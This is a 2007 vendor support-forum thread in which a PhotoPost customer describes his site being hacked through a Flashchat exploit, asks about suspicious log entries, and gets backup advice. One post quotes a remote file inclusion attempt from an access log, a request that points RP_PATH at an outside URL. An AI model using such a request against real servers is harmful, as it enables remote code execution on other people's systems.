PhotoPost Photo Gallery Sales PhotoPost Sales Toll Free Phone Number
Mon-Fri 9am-4pm EST
  PhotoPost Photo Sharing Photo Gallery    Visualize community tm
| | | | | | | | |

Go Back   PhotoPost Community > PhotoPost Support > PhotoPost Classifieds Support > Classifieds Bug Reports

Classifieds Bug Reports Post any problems you may be having with Classifieds here.

Reply
 
LinkBack Thread Tools Rate Thread Display Modes
Old October 31st, 2007, 11:35 PM   #1 (permalink)
Member
Verified Customer
 
Join Date: Mar 2005
Posts: 109
Hacked by spammers - any advice welcome!

Chuck I tried to send you a pm about this...

Victim of code injection...
showmembers.php, index.php etc...

I am in over my head.

Any help would be greatly appreciated - perhaps efforts here will help the community as a whole.

Last edited by caliman; November 1st, 2007 at 08:58 PM. Reason: removed email.
caliman is offline   Reply With Quote
Old November 1st, 2007, 08:51 AM   #2 (permalink)
Photopost Developer
Verified Customer
 
Chuck S's Avatar
 
Join Date: Jun 2002
Location: Abingdon,MD
Posts: 68,069
Well what do you mean by this please explain. To our knowledge our scripts have been checked by a security company and we are aware of no issues. We only typecast certain variables so I would need some explicit information here on your site where the issue is etc to determine your issue and where it has come from.
__________________
Photopost Developer and Support Engineer

Please do not PM me for support or sales questions. Thank you for your understanding.
Chuck S is offline   Reply With Quote
Old November 1st, 2007, 09:02 PM   #3 (permalink)
Member
Verified Customer
 
Join Date: Mar 2005
Posts: 109
Glad to hear it... from what I can tell most of my problems came from an old version of flashchat that was exploited. THey jacked my mail server to send out spam. A LOT of spam.

I have upgraded everything including my php from 4.4.7 to 5.2.2...

I still see things in my access logs like this:

"GET /reviews/index.php?RP_PATH=http://intranet.etc/sometextfile.txt


The RP_PATH stuff was fixed a long time ago right?

Just want to make sure before I turn on the lights!

Thanks.
caliman is offline   Reply With Quote
Old November 2nd, 2007, 08:21 AM   #4 (permalink)
Photopost Developer
Verified Customer
 
Chuck S's Avatar
 
Join Date: Jun 2002
Location: Abingdon,MD
Posts: 68,069
Yes the $RP_PATH thing was fixed years ago those are just people trying to exploit it still

Flashchat yep that is about the number one hacked program I have heard about over the years.
__________________
Photopost Developer and Support Engineer

Please do not PM me for support or sales questions. Thank you for your understanding.
Chuck S is offline   Reply With Quote
Old November 2nd, 2007, 01:55 PM   #5 (permalink)
Member
Verified Customer
 
Join Date: Mar 2005
Posts: 109
Yes and when I asked the chat developer via email if the new version addressed XSS exploits he immediately replied and said 'it addressed all known issues.'

When I told him I was hacked because of it and said no hard feelings, any advise for me, he no longer replied. So bye bye chat.

By the way Chuck, this whole experience has had me wise up about security. I want to back up my whole site better. One thing I am stuck on is the data folder for photos, reviews, etc... I keep my images there and out of the database - I think it's that folder right? Well anyway, you are probably better at unix than I, what is the best way to zip the photos up so I can download them?

Sincerely,

matt
caliman is offline   Reply With Quote
Old November 2nd, 2007, 05:37 PM   #6 (permalink)
Photopost Developer
Verified Customer
 
Chuck S's Avatar
 
Join Date: Jun 2002
Location: Abingdon,MD
Posts: 68,069
To backup Photopost you backup the entire folder and files and also backup your database.

http://www.gnu.org/software/gzip/manual/gzip.html

You can ask your server host what they recommend is the best utility they have on that specific server. You can only do command line if you have SSH access otherwise you need to do a normal ftp backup.
__________________
Photopost Developer and Support Engineer

Please do not PM me for support or sales questions. Thank you for your understanding.
Chuck S is offline   Reply With Quote
Old November 4th, 2007, 01:25 PM   #7 (permalink)
Member
Verified Customer
 
Join Date: Mar 2005
Posts: 109
Thanks Chuck.
caliman is offline   Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Similar Threads
Thread Thread Starter Forum Replies Last Post
Upgrade Advice benalembick General Discussion 11 August 8th, 2007 10:27 AM
Bit of Advice Please aspire Before You Buy 10 May 5th, 2007 05:21 PM
strategic advice artpapa Photopost Pro How Do I...? 5 January 10th, 2007 04:17 PM
Advice please. garybrun Classifieds Bug Reports 6 October 1st, 2005 02:33 AM


All times are GMT -5. The time now is 04:18 AM.

Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0